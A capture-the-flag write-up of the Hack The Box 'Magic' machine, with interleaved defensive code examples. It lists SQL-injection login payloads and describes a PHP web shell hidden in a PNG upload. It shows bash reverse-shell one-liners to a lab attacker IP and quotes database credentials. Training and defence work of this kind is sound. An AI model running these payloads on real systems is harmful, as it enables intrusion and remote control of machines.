OSCP PREPARATIONS – HTB Magic

Magic is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic scan

Full port scan

The port scan shows two open ports: 22/tcp (OpenSSH 7.6p1) and 80/tcp (Apache).
Let's enumerate port 80.

We enumerated the web application, checked Wappalyzer and examined the page source, but the only notable thing was a login page.
We ran a gobuster scan to find hidden files and directories and see what might be lurking.
Gobuster scan

We did not get any results in the Gobuster scan.
Let's go to the login.php page.

The login screen appears. We looked at the source code and found nothing interesting. This is the form where the default credentials would be entered; we could not log in, so we first try SQL injection to break this login.
admin' or 1=1;-- -

admin' or '1=1;#
1'or'1'=1'))
admin'#
admin'-- -

We were able to log in successfully.
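The login bypass above works because the username is pasted straight into the SQL text. The following Python snippet is an added example (not code from the machine or from this writeup) that rebuilds a toy login table in SQLite and runs the page's admin'-- - payload against a string-concatenated query and against a parameterised one. The table layout (users with username and password columns) is an assumption; the real schema behind login.php is not shown on the page.

```python
import sqlite3


# Constructed stand-in for the login database behind login.php (assumption:
# a users table with username and password columns; the real schema is unknown).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def vulnerable_login(conn, username, password):
    # The user-supplied strings become part of the SQL text, so a quote in the
    # username ends the string literal and "-- " comments out the password check.
    sql = ("SELECT 1 FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    # Bound parameters: the driver sends the values as data, they are never
    # parsed as SQL, so the same payload is just a username that does not exist.
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin'-- -"   # the same payload used against the login page above
    print("vulnerable:", vulnerable_login(db, payload, "wrong"))  # True
    print("safe:      ", safe_login(db, payload, "wrong"))        # False
```

The parameterised version is the whole fix for the injection; a real login would additionally compare a password hash rather than the plaintext stored here.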

We land on the upload page.
Let's test the file upload area, which is handled by PHP code.
We created an empty file with touch and tried to upload it.

As far as we can tell, only jpg, jpeg and png extensions are accepted; let's see how to bypass this.
First, let's add an additional extension to the file.
I decided to append png to the end.

Let's try by adding png at the end.
The file was accepted when I uploaded it as filetest.php.png. Now let's embed a PHP shell in a PNG file by placing it in a comment field.

Then we inserted php before the png extension so the server would interpret this PNG file as PHP, and uploaded it.

Let's browse to the location where the file was uploaded.

Here we appended ?cmd=id to the URL and it returned the output of id.
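The upload check on this machine evidently looked only at the last extension (and perhaps the image magic bytes), which is why shell.php.png with a PHP tag inside a PNG comment got through. The validator below is an added example, not the machine's PHP code, showing the checks a defender would want on the server side: exactly one extension, an extension from a whitelist, magic bytes that match that extension, no PHP open tag anywhere in the bytes, and a server-chosen random filename. The function name check_upload and its return shape are assumptions made for this example.

```python
import os
import secrets

# Magic bytes of the image types the upload form claims to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# PHP open tags; a legitimate image never needs to contain one.
PHP_TAGS = (b"<?php", b"<?=")


def check_upload(filename, data):
    """Return (True, stored_name) when the upload is acceptable,
    otherwise (False, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # Exactly one extension: "shell.php.png" has two, and a web server handler
    # that matches ".php" anywhere in the name would execute it as PHP.
    if len(parts) != 2 or not parts[0]:
        return False, "filename must have exactly one extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, "extension not allowed"
    # The bytes must really be an image of the declared type.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Defence in depth: a PHP tag hidden in an image comment chunk is exactly
    # the trick used above.
    if any(tag in data for tag in PHP_TAGS):
        return False, "embedded PHP tag"
    # Never keep the client's name; store under a random name the server chose.
    return True, "%s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    # Constructed sample inputs.
    png = MAGIC["png"] + b"\x00" * 16
    print(check_upload("photo.png", png))                           # (True, '<random>.png')
    print(check_upload("shell.php.png", png + b"<?php echo 1; ?>"))  # (False, ...)
```

The filename and content checks only reduce the attack surface; the decisive control is that the uploads directory is served with script execution disabled (or stored outside the web root), so that even a file that slips through is returned as bytes rather than run.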

Next I try to get it to give us a reverse shell.
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/4747 0>&1'
We used this command but it didn't work because of the spaces and other special characters, so we URL-encoded it.
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
and sent the request with the encoded payload.
This is how we got a shell.

In this shell we see that our privileges are limited, so we move on to local enumeration.

We did not find anything interesting with linpeas.sh, so we continue with manual local enumeration.

We obtained credentials from the db.php5 file.
theseus:iamkingtheseus
We tried to switch user with these credentials but could not log in; the password was incorrect.

This tells us that MySQL is running locally; let's look at the listening network connections to confirm it.

We confirmed that port 3306 is listening.
When we tried to connect with mysql, it reported that the mysql client was not available.

We typed mysql and pressed tab twice to see which MySQL binaries are installed.

After a bit of work with the show and dump options we were able to get a dump of the database.

This gave us credentials
theseus:Th3s3usW4sK1ng
Let's switch user using this password.

We have obtained the user flag, but we still do not have root privileges.
So let's continue with local enumeration.

The /bin/sysinfo binary prints information about the system.
In its MEM Usage section it runs the free command; we will manipulate this free command so that it runs bash instead, and try to obtain root privileges this way.

We didn't get any output here.

I think the commands are getting mixed up, so I'll have it give me a reverse shell instead.
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I enter the command.

This is how we got root privileges
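The privilege escalation above relies on a privileged helper (/bin/sysinfo) launching free by name, so whatever free is found first on the caller's PATH runs as root; that mechanism is inferred from the writeup, which does not show the binary's source. From the defender's side, this leaves a clear trace: an execve that runs with effective uid 0 on behalf of a non-root user, from an executable outside the system binary directories. The script below is an added example, not part of the original writeup, that applies that rule to a few constructed audit records in a simplified auditd SYSCALL layout; the record format, event ids and paths are all made up for the example.

```python
import re

# Directories from which a privileged helper should legitimately run commands.
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                "/usr/local/bin/", "/usr/local/sbin/")

# Constructed audit records in a simplified auditd SYSCALL layout (not captured
# from the machine). Record 102 is what a hijacked "free" looks like: the real
# uid is an unprivileged user, the effective uid is 0, and the executable lives
# in a world-writable directory.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1600000000.001:101): syscall=59 success=yes uid=1000 euid=0 comm="sysinfo" exe="/bin/sysinfo" cwd="/tmp"
type=SYSCALL msg=audit(1600000000.002:102): syscall=59 success=yes uid=1000 euid=0 comm="free" exe="/tmp/free" cwd="/tmp"
type=SYSCALL msg=audit(1600000000.003:103): syscall=59 success=yes uid=1000 euid=1000 comm="ls" exe="/bin/ls" cwd="/home/user"
type=SYSCALL msg=audit(1600000000.004:104): syscall=59 success=yes uid=1000 euid=0 comm="free" exe="/usr/bin/free" cwd="/home/user"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
EVENT_RE = re.compile(r'audit\([\d.]+:(\d+)\)')


def parse_record(line):
    """Split one key=value record into a dict; quoted values lose their quotes."""
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    m = EVENT_RE.search(line)
    fields["event"] = m.group(1) if m else None
    return fields


def find_privileged_untrusted_exec(lines):
    """Return [(event_id, exe)] for execve calls that run as root on behalf of
    a non-root user from a path outside TRUSTED_DIRS."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        r = parse_record(line)
        if r.get("syscall") != "59":          # 59 = execve on x86_64
            continue
        if r.get("euid") != "0" or r.get("uid") == "0":
            continue                           # not a privilege boundary
        exe = r.get("exe", "")
        if not exe.startswith(TRUSTED_DIRS):
            hits.append((r["event"], exe))
    return hits


if __name__ == "__main__":
    for event, exe in find_privileged_untrusted_exec(SAMPLE_LOG.splitlines()):
        print("suspicious privileged exec: event %s ran %s" % (event, exe))
```

The corresponding fix in the helper itself is to invoke free by its absolute path (or to reset PATH to a fixed, trusted value before calling it), and the same rule can be turned into an auditd filter on execve with euid=0 so that such executions are recorded rather than reconstructed afterwards.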